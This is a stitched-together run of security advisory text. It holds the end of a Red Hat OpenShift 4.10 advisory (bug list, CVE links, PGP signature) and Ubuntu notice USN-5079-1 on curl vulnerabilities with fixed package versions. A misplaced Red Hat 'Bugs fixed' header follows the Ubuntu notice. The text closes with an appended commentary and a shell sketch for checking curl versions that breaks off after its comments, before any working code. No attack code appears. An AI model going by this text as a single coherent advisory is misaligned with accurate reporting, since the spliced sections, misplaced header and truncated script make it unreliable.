2038240 - Error when configuring a file using permissions bigger than decimal 511 (octal 0777)
2038253 - Validator Policies are long lived
2038272 - Failures to build a PreprovisioningImage are not reported
2038384 - Azure Default Instance Types are Incorrect
2038389 - Failing test: [sig-arch] events should not repeat pathologically
2038412 - Import page calls the git file list unnecessarily twice from GitHub/GitLab/Bitbucket
2038465 - Upgrade chromedriver to 90.x to support Mac M1 chips
2038481 - kube-controller-manager-guard and openshift-kube-scheduler-guard pods being deleted and restarted on a cordoned node when drained
2038596 - Auto egressIP for OVN cluster on GCP: After egressIP object is deleted, egressIP still takes effect
2038663 - update kubevirt-plugin OWNERS
2038691 - [AUTH-8] Panic on user login when the user belongs to a group in the IdP side and the group already exists via "oc adm groups new"
2038705 - Update ptp reviewers
2038761 - Open Observe->Targets page, wait for a while, page become blank
2038768 - All the filters on the Observe->Targets page can't work
2038772 - Some monitors failed to display on Observe->Targets page
2038793 - [SDN EgressIP] After reboot egress node, the egressip was lost from egress node
2038827 - should add user containers in /etc/subuid and /etc/subgid to support running pods in user namespaces
2038832 - New templates for centos stream8 are missing registry suggestions in create vm wizard
2038840 - [SDN EgressIP]cloud-network-config-controller pod was CrashLoopBackOff after some operation
2038864 - E2E tests fail because multi-hop-net was not created
2038879 - All Builds are getting listed in DeploymentConfig under workloads on OpenShift Console
2038934 - CSI driver operators should use the trusted CA bundle when cluster proxy is configured
2038968 - Move feature gates from a carry patch to openshift/api
2039056 - Layout issue with breadcrumbs on API explorer page
2039057 - Kind column is not wide enough in API explorer page
2039064 - Bulk Import e2e test flaking at a high rate
2039065 - Diagnose and fix Bulk Import e2e test that was previously disabled
2039085 - Cloud credential operator configuration failing to apply in hypershift/ROKS clusters
2039099 - [OVN EgressIP GCP] After reboot egress node, egressip that was previously assigned got lost
2039109 - [FJ OCP4.10 Bug]: startironic.sh failed to pull the image of image-customization container when behind a proxy
2039119 - CVO hotloops on Service openshift-monitoring/cluster-monitoring-operator
2039170 - [upgrade]Error shown on registry operator "missing the cloud-provider-config configmap" after upgrade
2039227 - Improve image customization server parameter passing during installation
2039241 - Improve image customization server parameter passing during installation
2039244 - Helm Release revision history page crashes the UI
2039294 - SDN controller metrics cannot be consumed correctly by prometheus
2039311 - oc Does Not Describe Build CSI Volumes
2039315 - Helm release list page should only fetch secrets for deployed charts
2039321 - SDN controller metrics are not being consumed by prometheus
2039330 - Create NMState button doesn't work in OperatorHub web console
2039339 - cluster-ingress-operator should report Unupgradeable if user has modified the aws resources annotations
2039345 - CNO does not verify the minimum MTU value for IPv6/dual-stack clusters.
2039359 - oc adm prune deployments can't prune the RS where the associated Deployment no longer exists
2039382 - gather_metallb_logs does not have execution permission
2039406 - logout from rest session after vsphere operator sync is finished
2039408 - Add GCP region northamerica-northeast2 to allowed regions
2039414 - Cannot see the weights increased for NodeAffinity, InterPodAffinity, TaintandToleration
2039425 - No need to set KlusterletAddonConfig CR applicationManager->enabled: true in RAN ztp deployment
2039491 - oc - git:// protocol used in unit tests
2039516 - Bump OVN to ovn21.12-21.12.0-25
2039529 - Project Dashboard Resource Quotas Card empty state test flaking at a high rate
2039534 - Diagnose and fix Project Dashboard Resource Quotas Card test that was previously disabled
2039541 - Resolv-prepender script duplicating entries
2039586 - [e2e] update centos8 to centos stream8
2039618 - VM created from SAP HANA template leads to 404 page if leave one network parameter empty
2039619 - [AWS] In tree provisioner storageclass aws disk type should contain 'gp3' and csi provisioner storageclass default aws disk type should be 'gp3'
2039670 - Create PDBs for control plane components
2039678 - Page goes blank when create image pull secret
2039689 - [IPI on Alibabacloud] Pay-by-specification NAT is no longer supported
2039743 - React missing key warning when open operator hub detail page (and maybe others as well)
2039756 - React missing key warning when open KnativeServing details
2039770 - Observe dashboard doesn't react on time-range changes after browser reload when perspective is changed in another tab
2039776 - Observe dashboard shows nothing if the URL links to an non existing dashboard
2039781 - [GSS] OBC is not visible by admin of a Project on Console
2039798 - Contextual binding with Operator backed service creates visual connector instead of Service binding connector
2039868 - Insights Advisor widget is not in the disabled state when the Insights Operator is disabled
2039880 - Log level too low for control plane metrics
2039919 - Add E2E test for router compression feature
2039981 - ZTP for standard clusters installs stalld on master nodes
2040132 - Flag --port has been deprecated, This flag has no effect now and will be removed in v1.24. You can use --secure-port instead
2040136 - external-dns-operator pod keeps restarting and reports error: timed out waiting for cache to be synced
2040143 - [IPI on Alibabacloud] suggest to remove region "cn-nanjing" or provide better error message
2040150 - Update ConfigMap keys for IBM HPCS
2040160 - [IPI on Alibabacloud] installation fails when region does not support pay-by-bandwidth
2040285 - Bump build-machinery-go for console-operator to pickup change in yaml-patch repository
2040357 - bump OVN to ovn-2021-21.12.0-11.el8fdp
2040376 - "unknown instance type" error for supported m6i.xlarge instance
2040394 - Controller: enqueue the failed configmap till services update
2040467 - Cannot build ztp-site-generator container image
2040504 - Change AWS EBS GP3 IOPS in MachineSet doesn't take affect in OpenShift 4
2040521 - RouterCertsDegraded certificate could not validate route hostname v4-0-config-system-custom-router-certs.apps
2040535 - Auto-update boot source is not available in customize wizard
2040540 - ovs hardware offload: ovsargs format error when adding vf netdev name
2040603 - rhel worker scaleup playbook failed because missing some dependency of podman
2040616 - rolebindings page doesn't load for normal users
2040620 - [MAPO] Error pulling MAPO image on installation
2040653 - Topology sidebar warns that another component is updated while rendering
2040655 - User settings update fails when selecting application in topology sidebar
2040661 - Different react warnings about updating state on unmounted components when leaving topology
2040670 - Permafailing CI job: periodic-ci-openshift-release-master-nightly-4.10-e2e-gcp-libvirt-cert-rotation
2040671 - [Feature:IPv6DualStack] most tests are failing in dualstack ipi
2040694 - Three upstream HTTPClientConfig struct fields missing in the operator
2040705 - Du policy for standard cluster runs the PTP daemon on masters and workers
2040710 - cluster-baremetal-operator cannot update BMC subscription CR
2040741 - Add CI test(s) to ensure that metal3 components are deployed in vSphere, OpenStack and None platforms
2040782 - Import YAML page blocks input with more then one generateName attribute
2040783 - The Import from YAML summary page doesn't show the resource name if created via generateName attribute
2040791 - Default PGT policies must be 'inform' to integrate with the Lifecycle Operator
2040793 - Fix snapshot e2e failures
2040880 - do not block upgrades if we can't connect to vcenter
2041087 - MetalLB: MetalLB CR is not upgraded automatically from 4.9 to 4.10
2041093 - autounattend.xml missing
2041204 - link to templates in virtualization-cluster-overview inventory card is to all templates
2041319 - [IPI on Alibabacloud] installation in region "cn-shanghai" failed, due to "Resource alicloud_vswitch CreateVSwitch Failed...InvalidCidrBlock.Overlapped"
2041326 - Should bump cluster-kube-descheduler-operator to kubernetes version V1.23
2041329 - aws and gcp CredentialsRequest manifests missing ServiceAccountNames list for cloud-network-config-controller
2041361 - [IPI on Alibabacloud] Disable session persistence and removebBandwidth peak of listener
2041441 - Provision volume with size 3000Gi even if sizeRange: '[10-2000]GiB' in storageclass on IBM cloud
2041466 - Kubedescheduler version is missing from the operator logs
2041475 - React components should have a (mostly) unique name in react dev tools to simplify code analyses
2041483 - MetallB: quay.io/openshift/origin-kube-rbac-proxy:4.10 deploy Metallb CR is missing (controller and speaker pods)
2041492 - Spacing between resources in inventory card is too small
2041509 - GCP Cloud provider components should use K8s 1.23 dependencies
2041510 - cluster-baremetal-operator doesn't run baremetal-operator's subscription webhook
2041541 - audit: ManagedFields are dropped using API not annotation
2041546 - ovnkube: set election timer at RAFT cluster creation time
2041554 - use lease for leader election
2041581 - KubeDescheduler operator log shows "Use of insecure cipher detected"
2041583 - etcd and api server cpu mask interferes with a guaranteed workload
2041598 - Including CA bundle in Azure Stack cloud config causes MCO failure
2041605 - Dynamic Plugins: discrepancy in proxy alias documentation/implementation
2041620 - bundle CSV alm-examples does not parse
2041641 - Fix inotify leak and kubelet retaining memory
2041671 - Delete templates leads to 404 page
2041694 - [IPI on Alibabacloud] installation fails when region does not support the cloud_essd disk category
2041734 - ovs hwol: VFs are unbind when switchdev mode is enabled
2041750 - [IPI on Alibabacloud] trying "create install-config" with region "cn-wulanchabu (China (Ulanqab))" (or "ap-southeast-6 (Philippines (Manila))", "cn-guangzhou (China (Guangzhou))") failed due to invalid endpoint
2041763 - The Observe > Alerting pages no longer have their default sort order applied
2041830 - CI: ovn-kubernetes-master-e2e-aws-ovn-windows is broken
2041854 - Communities / Local prefs are applied to all the services regardless of the pool, and only one community is applied
2041882 - cloud-network-config operator can't work normal on GCP workload identity cluster
2041888 - Intermittent incorrect build to run correlation, leading to run status updates applied to wrong build, builds stuck in non-terminal phases
2041926 - [IPI on Alibabacloud] Installer ignores public zone when it does not exist
2041971 - [vsphere] Reconciliation of mutating webhooks didn't happen
2041989 - CredentialsRequest manifests being installed for ibm-cloud-managed profile
2041999 - [PROXY] external dns pod cannot recognize custom proxy CA
2042001 - unexpectedly found multiple load balancers
2042029 - kubedescheduler fails to install completely
2042036 - [IBMCLOUD] "openshift-install explain installconfig.platform.ibmcloud" contains not yet supported custom vpc parameters
2042049 - Seeing warning related to unrecognized feature gate in kubescheduler & KCM logs
2042059 - update discovery burst to reflect lots of CRDs on openshift clusters
2042069 - Revert toolbox to rhcos-toolbox
2042169 - Can not delete egressnetworkpolicy in Foreground propagation
2042181 - MetalLB: User should not be allowed add same bgp advertisement twice in BGP address pool
2042265 - [IBM]"--scale-down-utilization-threshold" doesn't work on IBMCloud
2042274 - Storage API should be used when creating a PVC
2042315 - Baremetal IPI deployment with IPv6 control plane and disabled provisioning network fails as the nodes do not pass introspection
2042366 - Lifecycle hooks should be independently managed
2042370 - [IPI on Alibabacloud] installer panics when the zone does not have an enhanced NAT gateway
2042382 - [e2e][automation] CI takes more then 2 hours to run
2042395 - Add prerequisites for active health checks test
2042438 - Missing rpms in openstack-installer image
2042466 - Selection does not happen when switching from Topology Graph to List View
2042493 - No way to verify if IPs with leading zeros are still valid in the apiserver
2042567 - insufficient info on CodeReady Containers configuration
2042600 - Alone, the io.kubernetes.cri-o.Devices option poses a security risk
2042619 - Overview page of the console is broken for hypershift clusters
2042655 - [IPI on Alibabacloud] cluster becomes unusable if there is only one kube-apiserver pod running
2042711 - [IBMCloud] Machine Deletion Hook cannot work on IBMCloud
2042715 - [AliCloud] Machine Deletion Hook cannot work on AliCloud
2042770 - [IPI on Alibabacloud] with vpcID & vswitchIDs specified, the installer would still try creating NAT gateway unexpectedly
2042829 - Topology performance: HPA was fetched for each Deployment (Pod Ring)
2042851 - Create template from SAP HANA template flow - VM is created instead of a new template
2042906 - Edit machineset with same machine deletion hook name succeed
2042960 - azure-file CI fails with "gid(0) in storageClass and pod fsgroup(1000) are not equal"
2043003 - [IPI on Alibabacloud] 'destroy cluster' of a failed installation (bug2041694) stuck after 'stage=Nat gateways'
2043042 - [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial]
2043043 - Cluster Autoscaler should use K8s 1.23 dependencies
2043064 - Topology performance: Unnecessary rerenderings in topology nodes (unchanged mobx props)
2043078 - Favorite system projects not visible in the project selector after toggling "Show default projects".
2043117 - Recommended operators links are erroneously treated as external
2043130 - Update CSI sidecars to the latest release for 4.10
2043234 - Missing validation when creating several BGPPeers with the same peerAddress
2043240 - Sync openshift/descheduler with sigs.k8s.io/descheduler
2043254 - crio does not bind the security profiles directory
2043296 - Ignition fails when reusing existing statically-keyed LUKS volume
2043297 - [4.10] Bootimage bump tracker
2043316 - RHCOS VM fails to boot on Nutanix AOS
2043446 - Rebase aws-efs-utils to the latest upstream version.
2043556 - Add proper ci-operator configuration to ironic and ironic-agent images
2043577 - DPU network operator
2043651 - Fix bug with exp. backoff working correcly when setting nextCheck in vsphere operator
2043675 - Too many machines deleted by cluster autoscaler when scaling down
2043683 - Revert bug 2039344 Ignoring IPv6 addresses against etcd cert validation
2043709 - Logging flags no longer being bound to command line
2043721 - Installer bootstrap hosts using outdated kubelet containing bugs
2043731 - [IBMCloud] terraform outputs missing for ibmcloud bootstrap and worker ips for must-gather
2043759 - Bump cluster-ingress-operator to k8s.io/api 1.23
2043780 - Bump router to k8s.io/api 1.23
2043787 - Bump cluster-dns-operator to k8s.io/api 1.23
2043801 - Bump CoreDNS to k8s.io/api 1.23
2043802 - EgressIP stopped working after single egressIP for a netnamespace is switched to the other node of HA pair after the first egress node is shutdown
2043961 - [OVN-K] If pod creation fails, retry doesn't work as expected.
2044201 - Templates golden image parameters names should be supported
2044244 - Builds are failing after upgrading the cluster with builder image [jboss-webserver-5/jws56-openjdk8-openshift-rhel8]
2044248 - [IBMCloud][vpc.block.csi.ibm.io]Cluster common user use the storageclass without parameter “csi.storage.k8s.io/fstype” create pvc,pod successfully but write data to the pod's volume failed of "Permission denied"
2044303 - [ovn][cloud-network-config-controller] cloudprivateipconfigs ips were left after deleting egressip objects
2044347 - Bump to kubernetes 1.23.3
2044481 - collect sharedresource cluster scoped instances with must-gather
2044496 - Unable to create hardware events subscription - failed to add finalizers
2044628 - CVE-2022-21673 grafana: Forward OAuth Identity Token can allow users to access some data sources
2044680 - Additional libovsdb performance and resource consumption fixes
2044704 - Observe > Alerting pages should not show runbook links in 4.10
2044717 - [e2e] improve tests for upstream test environment
2044724 - Remove namespace column on VM list page when a project is selected
2044745 - Upgrading cluster from 4.9 to 4.10 on Azure (ARO) causes the cloud-network-config-controller pod to CrashLoopBackOff
2044808 - machine-config-daemon-pull.service: use cp instead of cat when extracting MCD in OKD
2045024 - CustomNoUpgrade alerts should be ignored
2045112 - vsphere-problem-detector has missing rbac rules for leases
2045199 - SnapShot with Disk Hot-plug hangs
2045561 - Cluster Autoscaler should use the same default Group value as Cluster API
2045591 - Reconciliation of aws pod identity mutating webhook did not happen
2045849 - Add Sprint 212 translations
2045866 - MCO Operator pod spam "Error creating event" warning messages in 4.10
2045878 - Sync upstream 1.16.0 downstream; includes hybrid helm plugin
2045916 - [IBMCloud] Default machine profile in installer is unreliable
2045927 - [FJ OCP4.10 Bug]: Podman failed to pull the IPA image due to the loss of proxy environment
2046025 - [IPI on Alibabacloud] pre-configured alicloud DNS private zone is deleted after destroying cluster, please clarify
2046137 - oc output for unknown commands is not human readable
2046296 - When creating multiple consecutive egressIPs on GCP not all of them get assigned to the instance
2046297 - Bump DB reconnect timeout
2046517 - In Notification drawer, the "Recommendations" header shows when there isn't any recommendations
2046597 - Observe > Targets page may show the wrong service monitor is multiple monitors have the same namespace & label selectors
2046626 - Allow setting custom metrics for Ansible-based Operators
2046683 - [AliCloud]"--scale-down-utilization-threshold" doesn't work on AliCloud
2047025 - Installation fails because of Alibaba CSI driver operator is degraded
2047190 - Bump Alibaba CSI driver for 4.10
2047238 - When using communities and localpreferences together, only localpreference gets applied
2047255 - alibaba: resourceGroupID not found
2047258 - [aws-usgov] fatal error occurred if AMI is not provided for AWS GovCloud regions
2047317 - Update HELM OWNERS files under Dev Console
2047455 - [IBM Cloud] Update custom image os type
2047496 - Add image digest feature
2047779 - do not degrade cluster if storagepolicy creation fails
2047927 - 'oc get project' caused 'Observed a panic: cannot deep copy core.NamespacePhase' when AllRequestBodies is used
2047929 - use lease for leader election
2047975 - [sig-network][Feature:Router] The HAProxy router should override the route host for overridden domains with a custom value [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2048046 - New route annotation to show another URL or hide topology URL decorator doesn't work for Knative Services
2048048 - Application tab in User Preferences dropdown menus are too wide.
2048050 - Topology list view items are not highlighted on keyboard navigation
2048117 - [IBM]Shouldn't change status.storage.bucket and status.storage.resourceKeyCRN when update sepc.stroage,ibmcos with invalid value
2048413 - Bond CNI: Failed to attach Bond NAD to pod
2048443 - Image registry operator panics when finalizes config deletion
2048478 - [alicloud] CCM deploys alibaba-cloud-controller-manager from quay.io/openshift/origin-*
2048484 - SNO: cluster-policy-controller failed to start due to missing serving-cert/tls.crt
2048598 - Web terminal view is broken
2048836 - ovs-configure mis-detecting the ipv6 status on IPv4 only cluster causing Deployment failure
2048891 - Topology page is crashed
2049003 - 4.10: [IBMCloud] ibm-vpc-block-csi-node does not specify an update strategy, only resource requests, or priority class
2049043 - Cannot create VM from template
2049156 - 'oc get project' caused 'Observed a panic: cannot deep copy core.NamespacePhase' when AllRequestBodies is used
2049886 - Placeholder bug for OCP 4.10.0 metadata release
2049890 - Warning annotation for pods with cpu requests or limits on single-node OpenShift cluster without workload partitioning
2050189 - [aws-efs-csi-driver] Merge upstream changes since v1.3.2
2050190 - [aws-ebs-csi-driver] Merge upstream changes since v1.2.0
2050227 - Installation on PSI fails with: 'openstack platform does not have the required standard-attr-tag network extension'
2050247 - Failing test in periodics: [sig-network] Services should respect internalTrafficPolicy=Local Pod and Node, to Pod (hostNetwork: true) [Feature:ServiceInternalTrafficPolicy] [Skipped:Network/OVNKubernetes] [Suite:openshift/conformance/parallel] [Suite:k8s]
2050250 - Install fails to bootstrap, complaining about DefragControllerDegraded and sad members
2050310 - ContainerCreateError when trying to launch large (>500) numbers of pods across nodes
2050370 - alert data for burn budget needs to be updated to prevent regression
2050393 - ZTP missing support for local image registry and custom machine config
2050557 - Can not push images to image-registry when enabling KMS encryption in AlibabaCloud
2050737 - Remove metrics and events for master port offsets
2050801 - Vsphere upi tries to access vsphere during manifests generation phase
2050883 - Logger object in LSO does not log source location accurately
2051692 - co/image-registry is degrade because ImagePrunerDegraded: Job has reached the specified backoff limit
2052062 - Whereabouts should implement client-go 1.22+
2052125 - [4.10] Crio appears to be coredumping in some scenarios
2052210 - [aws-c2s] kube-apiserver crashloops due to missing cloud config
2052339 - Failing webhooks will block an upgrade to 4.10 mid-way through the upgrade.
2052458 - [IBM Cloud] ibm-vpc-block-csi-controller does not specify an update strategy, priority class, or only resource requests
2052598 - kube-scheduler should use configmap lease
2052599 - kube-controller-manger should use configmap lease
2052600 - Failed to scaleup RHEL machine against OVN cluster due to jq tool is required by configure-ovs.sh
2052609 - [vSphere CSI driver Operator] RWX volumes counts metrics vsphere_rwx_volumes_total not valid
2052611 - MetalLB: BGPPeer object does not have ability to set ebgpMultiHop
2052612 - MetalLB: Webhook Validation: Two BGPPeers instances can have different router ID set.
2052644 - Infinite OAuth redirect loop post-upgrade to 4.10.0-rc.1
2052666 - [4.10.z] change gitmodules to rhcos-4.10 branch
2052756 - [4.10] PVs are not being cleaned up after PVC deletion
2053175 - oc adm catalog mirror throws 'missing signature key' error when using file://local/index
2053218 - ImagePull fails with error "unable to pull manifest from example.com/busy.box:v5 invalid reference format"
2053252 - Sidepanel for Connectors/workloads in topology shows invalid tabs
2053268 - inability to detect static lifecycle failure
2053314 - requestheader IDP test doesn't wait for cleanup, causing high failure rates
2053323 - OpenShift-Ansible BYOH Unit Tests are Broken
2053339 - Remove dev preview badge from IBM FlashSystem deployment windows
2053751 - ztp-site-generate container is missing convenience entrypoint
2053945 - [4.10] Failed to apply sriov policy on intel nics
2054109 - Missing "app" label
2054154 - RoleBinding in project without subject is causing "Project access" page to fail
2054244 - Latest pipeline run should be listed on the top of the pipeline run list
2054288 - console-master-e2e-gcp-console is broken
2054562 - DPU network operator 4.10 branch need to sync with master
2054897 - Unable to deploy hw-event-proxy operator
2055193 - e2e-metal-ipi-serial-ovn-ipv6 is failing frequently
2055358 - Summary Interval Hardcoded in PTP Operator if Set in the Global Body Instead of Command Line
2055371 - Remove Check which enforces summary_interval must match logSyncInterval
2055689 - [ibm]Operator storage PROGRESSING and DEGRADED is true during fresh install for ocp4.11
2055894 - CCO mint mode will not work for Azure after sunsetting of Active Directory Graph API
2056441 - AWS EFS CSI driver should use the trusted CA bundle when cluster proxy is configured
2056479 - ovirt-csi-driver-node pods are crashing intermittently
2056572 - reconcilePrecaching error: cannot list resource "clusterserviceversions" in API group "operators.coreos.com" at the cluster scope"
2056629 - [4.10] EFS CSI driver can't unmount volumes with "wait: no child processes"
2056878 - (dummy bug) ovn-kubernetes ExternalTrafficPolicy still SNATs
2056928 - Ingresscontroller LB scope change behaviour differs for different values of aws-load-balancer-internal annotation
2056948 - post 1.23 rebase: regression in service-load balancer reliability
2057438 - Service Level Agreement (SLA) always show 'Unknown'
2057721 - Fix Proxy support in RHACM 2.4.2
2057724 - Image creation fails when NMstateConfig CR is empty
2058641 - [4.10] Pod density test causing problems when using kube-burner
2059761 - 4.9.23-s390x-machine-os-content manifest invalid when mirroring content for disconnected install
2060610 - Broken access to public images: Unable to connect to the server: no basic auth credentials
2060956 - service domain can't be resolved when networkpolicy is used in OCP 4.10-rc
- References:
https://access.redhat.com/security/cve/CVE-2014-3577
https://access.redhat.com/security/cve/CVE-2016-10228
https://access.redhat.com/security/cve/CVE-2017-14502
https://access.redhat.com/security/cve/CVE-2018-20843
https://access.redhat.com/security/cve/CVE-2018-1000858
https://access.redhat.com/security/cve/CVE-2019-8625
https://access.redhat.com/security/cve/CVE-2019-8710
https://access.redhat.com/security/cve/CVE-2019-8720
https://access.redhat.com/security/cve/CVE-2019-8743
https://access.redhat.com/security/cve/CVE-2019-8764
https://access.redhat.com/security/cve/CVE-2019-8766
https://access.redhat.com/security/cve/CVE-2019-8769
https://access.redhat.com/security/cve/CVE-2019-8771
https://access.redhat.com/security/cve/CVE-2019-8782
https://access.redhat.com/security/cve/CVE-2019-8783
https://access.redhat.com/security/cve/CVE-2019-8808
https://access.redhat.com/security/cve/CVE-2019-8811
https://access.redhat.com/security/cve/CVE-2019-8812
https://access.redhat.com/security/cve/CVE-2019-8813
https://access.redhat.com/security/cve/CVE-2019-8814
https://access.redhat.com/security/cve/CVE-2019-8815
https://access.redhat.com/security/cve/CVE-2019-8816
https://access.redhat.com/security/cve/CVE-2019-8819
https://access.redhat.com/security/cve/CVE-2019-8820
https://access.redhat.com/security/cve/CVE-2019-8823
https://access.redhat.com/security/cve/CVE-2019-8835
https://access.redhat.com/security/cve/CVE-2019-8844
https://access.redhat.com/security/cve/CVE-2019-8846
https://access.redhat.com/security/cve/CVE-2019-9169
https://access.redhat.com/security/cve/CVE-2019-13050
https://access.redhat.com/security/cve/CVE-2019-13627
https://access.redhat.com/security/cve/CVE-2019-14889
https://access.redhat.com/security/cve/CVE-2019-15903
https://access.redhat.com/security/cve/CVE-2019-19906
https://access.redhat.com/security/cve/CVE-2019-20454
https://access.redhat.com/security/cve/CVE-2019-20807
https://access.redhat.com/security/cve/CVE-2019-25013
https://access.redhat.com/security/cve/CVE-2020-1730
https://access.redhat.com/security/cve/CVE-2020-3862
https://access.redhat.com/security/cve/CVE-2020-3864
https://access.redhat.com/security/cve/CVE-2020-3865
https://access.redhat.com/security/cve/CVE-2020-3867
https://access.redhat.com/security/cve/CVE-2020-3868
https://access.redhat.com/security/cve/CVE-2020-3885
https://access.redhat.com/security/cve/CVE-2020-3894
https://access.redhat.com/security/cve/CVE-2020-3895
https://access.redhat.com/security/cve/CVE-2020-3897
https://access.redhat.com/security/cve/CVE-2020-3899
https://access.redhat.com/security/cve/CVE-2020-3900
https://access.redhat.com/security/cve/CVE-2020-3901
https://access.redhat.com/security/cve/CVE-2020-3902
https://access.redhat.com/security/cve/CVE-2020-8927
https://access.redhat.com/security/cve/CVE-2020-9802
https://access.redhat.com/security/cve/CVE-2020-9803
https://access.redhat.com/security/cve/CVE-2020-9805
https://access.redhat.com/security/cve/CVE-2020-9806
https://access.redhat.com/security/cve/CVE-2020-9807
https://access.redhat.com/security/cve/CVE-2020-9843
https://access.redhat.com/security/cve/CVE-2020-9850
https://access.redhat.com/security/cve/CVE-2020-9862
https://access.redhat.com/security/cve/CVE-2020-9893
https://access.redhat.com/security/cve/CVE-2020-9894
https://access.redhat.com/security/cve/CVE-2020-9895
https://access.redhat.com/security/cve/CVE-2020-9915
https://access.redhat.com/security/cve/CVE-2020-9925
https://access.redhat.com/security/cve/CVE-2020-9952
https://access.redhat.com/security/cve/CVE-2020-10018
https://access.redhat.com/security/cve/CVE-2020-11793
https://access.redhat.com/security/cve/CVE-2020-13434
https://access.redhat.com/security/cve/CVE-2020-14391
https://access.redhat.com/security/cve/CVE-2020-15358
https://access.redhat.com/security/cve/CVE-2020-15503
https://access.redhat.com/security/cve/CVE-2020-25660
https://access.redhat.com/security/cve/CVE-2020-25677
https://access.redhat.com/security/cve/CVE-2020-27618
https://access.redhat.com/security/cve/CVE-2020-27781
https://access.redhat.com/security/cve/CVE-2020-29361
https://access.redhat.com/security/cve/CVE-2020-29362
https://access.redhat.com/security/cve/CVE-2020-29363
https://access.redhat.com/security/cve/CVE-2021-3121
https://access.redhat.com/security/cve/CVE-2021-3326
https://access.redhat.com/security/cve/CVE-2021-3449
https://access.redhat.com/security/cve/CVE-2021-3450
https://access.redhat.com/security/cve/CVE-2021-3516
https://access.redhat.com/security/cve/CVE-2021-3517
https://access.redhat.com/security/cve/CVE-2021-3518
https://access.redhat.com/security/cve/CVE-2021-3520
https://access.redhat.com/security/cve/CVE-2021-3521
https://access.redhat.com/security/cve/CVE-2021-3537
https://access.redhat.com/security/cve/CVE-2021-3541
https://access.redhat.com/security/cve/CVE-2021-3733
https://access.redhat.com/security/cve/CVE-2021-3749
https://access.redhat.com/security/cve/CVE-2021-20305
https://access.redhat.com/security/cve/CVE-2021-21684
https://access.redhat.com/security/cve/CVE-2021-22946
https://access.redhat.com/security/cve/CVE-2021-22947
https://access.redhat.com/security/cve/CVE-2021-25215
https://access.redhat.com/security/cve/CVE-2021-27218
https://access.redhat.com/security/cve/CVE-2021-30666
https://access.redhat.com/security/cve/CVE-2021-30761
https://access.redhat.com/security/cve/CVE-2021-30762
https://access.redhat.com/security/cve/CVE-2021-33928
https://access.redhat.com/security/cve/CVE-2021-33929
https://access.redhat.com/security/cve/CVE-2021-33930
https://access.redhat.com/security/cve/CVE-2021-33938
https://access.redhat.com/security/cve/CVE-2021-36222
https://access.redhat.com/security/cve/CVE-2021-37750
https://access.redhat.com/security/cve/CVE-2021-39226
https://access.redhat.com/security/cve/CVE-2021-41190
https://access.redhat.com/security/cve/CVE-2021-43813
https://access.redhat.com/security/cve/CVE-2021-44716
https://access.redhat.com/security/cve/CVE-2021-44717
https://access.redhat.com/security/cve/CVE-2022-0532
https://access.redhat.com/security/cve/CVE-2022-21673
https://access.redhat.com/security/cve/CVE-2022-24407
https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBYipqONzjgjWX9erEAQjQcBAAgWTjA6Q2NgqfVf63ZpJF1jPurZLPqxDL
0in/5+/wqWaiQ6yk7wM3YBZgviyKnAMCVdrLsaR7R77BvfJcTE3W/fzogxpp6Rne
eGT1PTgQRecrSIn+WG4gGSteavTULWOIoPvUiNpiy3Y7fFgjFdah+Nyx3Xd+xehM
CEswylOd6Hr03KZ1tS3XL3kGL2botha48Yls7FzDFbNcy6TBAuycmQZifKu8mHaF
aDAupVJinDnnVgACeS6CnZTAD+Vrx5W7NIisteXv4x5Hy+jBIUHr8Yge3oxYoFnC
Y/XmuOw2KilLZuqFe+KHig45qT+FmNU8E1egcGpNWvmS8hGZfiG1jEQAqDPbZHxp
sQAQZLQyz3TvXa29vp4QcsUuMxndIOi+QaK75JmqE06MqMIlFDYpr6eQOIgIZvFO
RDZU/qvBjh56ypInoqInBf8KOQMy6eO+r6nFbMGcAfucXmz0EVcSP1oFHAoA1nWN
rs1Qz/SO4CvdPERxcr1MLuBLggZ6iqGmHKk5IN0SwcndBHaVJ3j/LBv9m7wBYVry
bSvojBDYx5ricbTwB5sGzu7oH5yVl813FA9cjkFpEhBiMtTfI+DKC8ssoRYNHd5Z
7gLW6KWPUIDuCIiiioPZAJMyvJ0IMrNDoQ0lhqPeV7PFdlRhT95M/DagUZOpPVuT
b5PUYUBIZLc=
=GUDA
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
==========================================================================
Ubuntu Security Notice USN-5079-1
September 15, 2021
curl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 21.04
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
Summary:
Several security issues were fixed in curl.
Software Description:
- curl: HTTP, HTTPS, and FTP client and client libraries
Details:
It was discovered that curl incorrect handled memory when sending data to an MQTT server. A remote attacker could use this issue to cause curl to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2021-22945)
Patrick Monnerat discovered that curl incorrectly handled upgrades to TLS. (CVE-2021-22946)
Patrick Monnerat discovered that curl incorrectly handled responses received before STARTTLS. A remote attacker could possibly use this issue to inject responses and intercept communications. (CVE-2021-22947)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 21.04:
  curl 7.74.0-1ubuntu2.3
  libcurl3-gnutls 7.74.0-1ubuntu2.3
  libcurl3-nss 7.74.0-1ubuntu2.3
  libcurl4 7.74.0-1ubuntu2.3

Ubuntu 20.04 LTS:
  curl 7.68.0-1ubuntu2.7
  libcurl3-gnutls 7.68.0-1ubuntu2.7
  libcurl3-nss 7.68.0-1ubuntu2.7
  libcurl4 7.68.0-1ubuntu2.7

Ubuntu 18.04 LTS:
  curl 7.58.0-2ubuntu3.15
  libcurl3-gnutls 7.58.0-2ubuntu3.15
  libcurl3-nss 7.58.0-2ubuntu3.15
  libcurl4 7.58.0-2ubuntu3.15
In general, a standard system update will make all the necessary changes.

Bugs fixed (https://bugzilla.redhat.com/):
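On a Debian/Ubuntu system, whether an installed package already includes one of the fixed versions listed above can be checked by comparing version strings. The following is a minimal sketch, not part of the advisory: it uses `sort -V` (GNU coreutils version ordering, which approximates but is not identical to dpkg's comparison rules) and a placeholder installed version; on a real system the installed version would come from something like `dpkg-query -W -f='${Version}' curl`.

```shell
#!/bin/sh
# Sketch: compare an installed curl package version against the fixed
# version for Ubuntu 20.04 LTS from this notice (7.68.0-1ubuntu2.7).
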